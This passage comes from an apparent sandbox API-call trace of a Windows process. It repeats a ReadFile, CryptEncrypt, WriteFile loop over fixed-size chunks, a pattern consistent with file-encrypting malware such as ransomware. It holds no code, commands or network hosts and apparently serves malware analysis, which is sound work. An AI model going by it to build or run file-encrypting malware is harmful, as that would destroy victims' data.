pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.079] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.080] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.080] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.080] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.080] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.080] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.080] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.080] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.080] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.080] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.080] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.080] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.080] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.081] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.081] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.081] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.081] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.081] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.081] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.081] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.081] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.081] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.081] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.081] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.081] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.081] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.082] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.082] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.082] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.082] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.082] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.082] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.082] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.082] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.082] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.082] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.083] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.083] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.083] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.083] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.083] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.083] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.083] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.083] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.084] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.084] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.084] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.084] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.084] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.084] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.084] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.084] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.085] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.085] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.088] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.088] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.089] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.089] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.089] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.089] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.089] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.089] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.090] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.090] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.090] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.090] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.090] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.090] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.090] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.090] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.090] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.090] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.091] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.091] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.091] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.091] 